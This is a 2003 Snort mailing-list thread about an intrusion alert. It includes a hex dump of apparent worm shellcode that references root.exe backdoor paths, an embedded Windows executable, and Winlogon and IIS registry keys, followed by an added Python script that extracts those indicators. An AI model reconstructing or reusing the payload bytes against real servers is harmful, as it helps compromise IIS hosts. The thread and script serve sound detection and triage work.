Snort mailing list archives
RE: different CMD.exe access?!?
From: "L. Christopher Luther" <CLuther () Xybernaut com>
Date: Tue, 11 Mar 2003 11:40:08 -0500
By the references to root.exe, it looks like CodeRed to me (IMHO). I've also noticed that some of the packet dumps contain 'garbage' or what may be left over from other memory segments. I believe that there may have been a SANS or CERT notification about some TCP/IP stacks that leave droppings around.

Christopher

-----Original Message-----
From: John Hally [mailto:JHally () epnet com]
Sent: Tuesday, March 11, 2003 10:59 AM
To: 'snort-users () lists sourceforge net'
Subject: [Snort-users] different CMD.exe access?!?

Hello,

This is a different looking trace that tripped on the CMD.EXE rule. I usually see a bunch of ../../../cmd.exe, but this one looks different. Anyone else seeing this? It originated from 219.240.31.44, over in Korea:

000 : 61 6D 65 00 FF 75 BC FF 55 F8 89 45 98 E8 10 00 ame..u..U..E....
010 : 00 00 57 53 41 47 65 74 4C 61 73 74 45 72 72 6F ..WSAGetLastErro
020 : 72 00 FF 75 BC FF 55 F8 89 45 94 E8 0B 00 00 00 r..u..U..E......
030 : 55 53 45 52 33 32 2E 44 4C 4C 00 FF 55 F4 89 45 USER32.DLL..U..E
040 : 90 E8 0E 00 00 00 45 78 69 74 57 69 6E 64 6F 77 ......ExitWindow
050 : 73 45 78 00 FF 75 90 FF 55 F8 89 45 8C C3 8B 45 sEx..u..U..E...E
060 : 84 69 C0 05 84 08 08 40 89 45 84 8D 84 04 78 56 .i.....@.E...xV
070 : 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF FF FF 3C 00 74 4............<.t
080 : F7 3C FF 74 F3 C3 E8 ED FF FF FF 8A F8 E8 E6 FF .<.t............
090 : FF FF 8A D8 C1 E3 10 E8 DC FF FF FF 8A F8 E8 D5 ................
0a0 : FF FF FF 8A D8 E8 B4 FF FF FF 83 E0 07 E8 20 00 .............. .
0b0 : 00 00 FF FF FF FF 00 FF FF FF 00 FF FF FF 00 FF ................
0c0 : FF FF 00 FF FF FF 00 00 FF FF 00 00 FF FF 00 00 ................
0d0 : FF FF 59 8B 04 81 23 D8 F7 D0 23 85 58 FE FF FF ..Y...#...#.X...
0e0 : 0B D8 80 FB 7F 74 9F 80 FB E0 74 9A 3B 9D 58 FE ....t....t.;.X.
0f0 : FF FF 74 92 C3 68 04 01 00 00 8D 85 5C FE FF FF ..t..h......\...
100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00 P.U....\........
110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63 \CMD.EXE.^.....c
120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75 j......d:\inetpu
130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65 b\scripts\root.e
140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF xe...$....\...P.
150 : 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 6F 67 U.j..+...d:\prog
160 : 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 ra~1\common~1\sy
170 : 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F 74 2E stem\MSADC\root.
180 : 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 exe...$....\...P
190 : FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 00 00 .U.......MZP....
1a0 : 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 ................
1b0 : 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC 00 00 .@..............
1c0 : 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 00 00 PE..L....*%)....
1d0 : 00 00 00 00 E0 00 8F 81 0B 01 02 19 00 04 00 00 ................
1e0 : 00 08 00 00 00 00 00 00 00 10 00 00 00 10 00 00 ................
1f0 : 00 20 00 00 00 00 40 00 00 10 00 00 00 04 00 00 . ....@.........
200 : 01 00 00 00 00 00 00 00 03 00 0A 00 00 00 00 00 ................
210 : 00 40 00 00 00 04 00 00 00 00 00 00 02 00 00 00 .@..............
220 : 00 00 10 00 00 20 00 00 00 00 10 00 00 10 00 00 ..... ..........
230 : 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ................
240 : 00 30 00 00 0C 01 FC FC FC 00 00 00 00 00 00 00 .0..............
250 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
260 : 00 00 00 00 10 00 00 00 10 00 00 00 04 00 00 00 ................
270 : 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 ...............
280 : 00 00 60 00 00 00 00 00 00 00 00 00 10 00 00 00 ..`.............
290 : 20 00 00 00 04 00 00 00 0C 00 00 00 00 00 00 00 ...............
2a0 : 00 00 00 00 00 00 00 40 00 00 C0 00 00 00 00 00 .......@........
2b0 : 00 00 00 00 10 00 00 00 30 00 00 00 04 00 00 00 ........0.......
2c0 : 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ...............@
2d0 : 00 00 C0 FC FC FC FC FC FC FC FC FC FC FC FC FC ................
2e0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
2f0 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC 00 ................
300 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 ...............h
310 : 04 01 00 00 68 D0 20 40 00 E8 61 01 00 00 8D B8 ....h. @..a.....
320 : D0 20 40 00 BE 00 20 40 00 A5 A5 A5 A5 6A 01 68 . @... @.....j.h
330 : D0 20 40 00 E8 4C 01 00 00 E8 0C 00 00 00 68 C0 . @..L........h.
340 : 27 09 00 E8 31 01 00 00 EB EF 68 D8 24 40 00 68 '...1.....h.$@.h
350 : 3F 00 0F 00 6A 00 68 10 20 40 00 68 02 00 00 80 ?...j.h. @.h....
360 : E8 32 01 00 00 0B C0 75 26 6A 04 68 54 20 40 00 .2.....u&j.hT @.
370 : 6A 04 6A 00 68 48 20 40 00 FF 35 D8 24 40 00 E8 j.j.hH @..5.$@..
380 : 0D 01 00 00 FF 35 D8 24 40 00 E8 0E 01 00 00 68 .....5.$@......h
390 : D8 24 40 00 68 3F 00 0F 00 6A 00 68 58 20 40 00 .$@.h?...j.hX @.
3a0 : 68 02 00 00 80 E8 ED 00 00 00 0B C0 75 55 BD 9C h...........uU..
3b0 : 20 40 00 E8 4C 00 00 00 BD A8 20 40 00 E8 42 00 @..L..... @..B.
3c0 : 00 00 6A 09 68 B8 20 40 00 6A 01 6A 00 68 B0 20 ..j.h. @.j.j.h.
3d0 : 40 00 FF 35 D8 24 40 00 E8 B4 00 00 00 6A 09 68 @..5.$@......j.h
3e0 : C4 20 40 00 6A 01 6A 00 68 B4 20 40 00 FF 35 D8 . @.j.j.h. @..5.
3f0 : 24 40 00 E8 99 00 00 00 FF 35 D8 24 40 00 E8 9A $@.......5.$@...
400 : 00 00 00 C3 C7 05 D0 24 40 00 00 04 00 00 68 D0 .......$@.....h.
410 : 24 40 00 68 D0 20 40 00 68 D4 24 40 00 6A 00 55 $@.h. @.h.$@.j.U
420 : FF 35 D8 24 40 00 E8 60 00 00 00 0B C0 75 49 A1 .5.$@..`.....uI.
430 : D0 24 40 00 0B C0 74 40 BE D0 20 40 00 80 3E 00 .$@...t@.. @..>.
440 : 74 36 46 66 81 7E FE 2C 2C 75 F2 C7 06 32 31 37 t6Ff.~.,,u...217
450 : 00 81 EE CC 20 40 00 89 35 D0 24 40 00 FF 35 D0 .... @..5.$@..5.
460 : 24 40 00 68 D0 20 40 00 6A 01 6A 00 55 FF 35 D8 $@.h. @.j.j.U.5.
470 : 24 40 00 E8 19 00 00 00 C3 FF 25 60 30 40 00 FF $@........%`0@..
480 : 25 64 30 40 00 FF 25 68 30 40 00 FF 25 70 30 40 %d0@..%h0@..%p0@
490 : 00 FF 25 74 30 40 00 FF 25 78 30 40 00 FF 25 7C ..%t0@..%x0@..%|
4a0 : 30 40 FC FC FC FC FC FC FC FC FC FC FC FC FC FC 0@..............
4b0 : FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 58 45 00 ..\EXPLORER.EXE.
4d0 : 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F ..SOFTWARE\Micro
4e0 : 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C soft\Windows NT\
4f0 : 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 57 CurrentVersion\W
500 : 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 44 69 73 inlogon...SFCDis
510 : 61 62 6C 65 00 00 9D FF FF FF 53 59 53 54 45 4D able......SYSTEM
520 : 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 \CurrentControlS
530 : 65 74 5C 53 65 72 76 69 63 65 73 5C 57 33 53 56 et\Services\W3SV
540 : 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 56 69 72 C\Parameters\Vir
550 : 74 75 61 6C 20 52 6F 6F tual Roo
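The reply keys on the root.exe references in John's dump, and the same dump carries several other plaintext artifacts worth pulling out when corroborating a CMD.EXE rule hit: the two root.exe drop paths, the EXPLORER.EXE reference, the Winlogon and SFCDisable registry strings, the W3SVC virtual-roots key, and the MZ/PE markers of an embedded executable. As an added example (not part of the thread and not Snort code), the Python script below parses the "offset : hex bytes  ascii" format exactly as posted, merges contiguous lines so strings that straddle a line boundary are still found, extracts printable strings, and reports where each indicator sits. The sample bytes are copied verbatim from the post (offsets 0x100-0x1c0 and 0x4c0-0x550); the indicator names and the parsing approach are my own.

```python
"""Triage an 'offset : hex bytes  ascii' packet dump of the kind pasted in the post."""
import re
from typing import Dict, List, Tuple

# Constructed sample: two runs of lines copied verbatim from the dump in the post
# (offsets 0x100-0x1c0 and 0x4c0-0x550); the rest of the dump is omitted here.
SAMPLE_DUMP = r"""
100 : 50 FF 55 E0 8D BC 05 5C FE FF FF E8 09 00 00 00 P.U....\........
110 : 5C 43 4D 44 2E 45 58 45 00 5E FC A5 A5 A4 B3 63 \CMD.EXE.^.....c
120 : 6A 01 E8 1C 00 00 00 64 3A 5C 69 6E 65 74 70 75 j......d:\inetpu
130 : 62 5C 73 63 72 69 70 74 73 5C 72 6F 6F 74 2E 65 b\scripts\root.e
140 : 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 FF xe...$....\...P.
150 : 55 DC 6A 01 E8 2B 00 00 00 64 3A 5C 70 72 6F 67 U.j..+...d:\prog
160 : 72 61 7E 31 5C 63 6F 6D 6D 6F 6E 7E 31 5C 73 79 ra~1\common~1\sy
170 : 73 74 65 6D 5C 4D 53 41 44 43 5C 72 6F 6F 74 2E stem\MSADC\root.
180 : 65 78 65 00 8B 0C 24 88 19 8D 85 5C FE FF FF 50 exe...$....\...P
190 : FF 55 DC E8 BA 05 00 00 FC 4D 5A 50 00 02 00 00 .U.......MZP....
1a0 : 00 04 00 0F 00 FF FF 00 00 B8 00 00 00 00 00 00 ................
1b0 : 00 40 00 1A FC 00 00 01 FC FC FC FC FC FC 00 00 .@..............
1c0 : 50 45 00 00 4C 01 03 00 FD 2A 25 29 00 00 00 00 PE..L....*%)....
4c0 : 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 58 45 00 ..\EXPLORER.EXE.
4d0 : 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 63 72 6F ..SOFTWARE\Micro
4e0 : 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 4E 54 5C soft\Windows NT\
4f0 : 43 75 72 72 65 6E 74 56 65 72 73 69 6F 6E 5C 57 CurrentVersion\W
500 : 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 44 69 73 inlogon...SFCDis
510 : 61 62 6C 65 00 00 9D FF FF FF 53 59 53 54 45 4D able......SYSTEM
520 : 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 \CurrentControlS
530 : 65 74 5C 53 65 72 76 69 63 65 73 5C 57 33 53 56 et\Services\W3SV
540 : 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 56 69 72 C\Parameters\Vir
550 : 74 75 61 6C 20 52 6F 6F tual Roo
"""

# One dump line: hex offset, colon, 1..16 two-digit hex bytes, then the ASCII column.
# The byte run is capped at 16 so ASCII text that happens to look like hex is not
# swallowed on full lines; a short line whose ASCII starts with a hex-like word would
# still be misread, which the offset-continuity merge below exposes as a split segment.
_LINE_RE = re.compile(r"^\s*([0-9A-Fa-f]+)\s*:\s*((?:[0-9A-Fa-f]{2}(?:\s|$)){1,16})")
_STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")  # 'strings'-style: 6+ printable bytes

# Indicator strings taken from the dump in the post; the labels are my own.
INDICATORS: Dict[str, bytes] = {
    "cmd.exe reference": b"\\CMD.EXE",
    "root.exe drop path (scripts)": b"d:\\inetpub\\scripts\\root.exe",
    "root.exe drop path (MSADC)": b"\\MSADC\\root.exe",
    "explorer.exe reference": b"\\EXPLORER.EXE",
    "Winlogon registry key": b"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",
    "SFCDisable value": b"SFCDisable",
    "IIS virtual roots key": b"SYSTEM\\CurrentControlSet\\Services\\W3SVC\\Parameters",
    "DOS/PE header (MZ)": b"MZ",
    "PE signature": b"PE\x00\x00",
}


def parse_hexdump(text: str) -> List[Tuple[int, bytes]]:
    """Parse dump lines into (base_offset, bytes) segments, merging contiguous lines."""
    segments: List[Tuple[int, bytes]] = []
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue  # blank line or surrounding mail text, not a dump line
        offset = int(m.group(1), 16)
        data = bytes.fromhex(m.group(2))  # fromhex ignores the separating whitespace
        if segments and segments[-1][0] + len(segments[-1][1]) == offset:
            base, buf = segments[-1]
            segments[-1] = (base, buf + data)  # continues the previous line
        else:
            segments.append((offset, data))  # gap in the dump: start a new segment
    return segments


def printable_strings(base: int, buf: bytes) -> List[Tuple[int, str]]:
    """Return (absolute_offset, text) for every run of 6+ printable ASCII bytes."""
    return [(base + m.start(), m.group().decode("ascii")) for m in _STRING_RE.finditer(buf)]


def scan(segments: List[Tuple[int, bytes]],
         indicators: Dict[str, bytes] = INDICATORS) -> List[Tuple[int, str]]:
    """Locate every indicator in every segment; returns (absolute_offset, label) sorted."""
    hits: List[Tuple[int, str]] = []
    for base, buf in segments:
        for label, needle in indicators.items():
            start = 0
            while (i := buf.find(needle, start)) != -1:
                hits.append((base + i, label))
                start = i + 1
    return sorted(hits)


if __name__ == "__main__":
    segs = parse_hexdump(SAMPLE_DUMP)
    for base, buf in segs:
        print(f"segment at 0x{base:04x}, {len(buf)} bytes")
        for off, text in printable_strings(base, buf):
            print(f"  0x{off:04x}  {text!r}")
    for off, label in scan(segs):
        print(f"indicator 0x{off:04x}  {label}")
```

The continuity merge matters for this particular dump: the Winlogon key starts on the 4d0 line and ends on the 500 line, so a line-at-a-time search would miss it. The URI rule that fired sees only the `cmd.exe` request on the wire; a byte-level pass over the captured payload like this one is how you confirm what the request was carrying before deciding whether the alert is the same old scanner noise or something that needs a host checked.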